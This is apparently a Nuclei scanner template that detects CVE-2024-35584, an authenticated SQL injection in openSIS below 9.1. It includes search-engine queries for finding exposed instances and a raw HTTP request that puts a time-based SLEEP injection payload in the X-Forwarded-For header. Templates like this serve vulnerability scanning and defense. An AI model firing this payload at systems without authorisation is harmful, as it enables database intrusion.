id: CVE-2024-35584

info:
  name: openSIS < 9.1 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection.
  impact: |
    Authenticated attackers can perform SQL injection via the X-Forwarded-For header, potentially extracting or modifying sensitive database information.
  remediation: |
    Update openSIS to a version later than 9.1 that patches the SQL injection vulnerability.
  reference:
    - https://www.tenable.com/cve/CVE-2024-35584
    - https://vuldb.com/?id.280406
    - https://github.com/whwhwh96/CVE-2024-35584
    - https://github.com/OS4ED/openSIS-Classic
    - http://opensis.com
    - https://nvd.nist.gov/vuln/detail/CVE-2024-35584
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-35584
    cwe-id: CWE-89
    epss-score: 0.85174
    epss-percentile: 0.99371
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query: http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2024,opensis,authenticated,sqli,vuln

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        @timeout 20s
        GET /Ajax.php?modname=tools/notallowed.php HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1

    matchers:
      - type: dsl
        dsl:
          - duration_2>=7
          - contains(body_1, "openSIS") && contains_all(body_2, "donetext:", "\'Done\'")
          - status_code_1 == 200 && status_code_2 == 200
        condition: and
# digest: 4a0a00473045022100b47bb7ec705e3a3826fc5f7c27f3a0e0a92e62e7e103f7706f3b5ce8b4b38b8a0220231d683dc0de5e9e1cdb1f70c33d321ed8f2db89fd9a91e697b883afb1138dbc:922c64590222798bb761d5b6d8e72950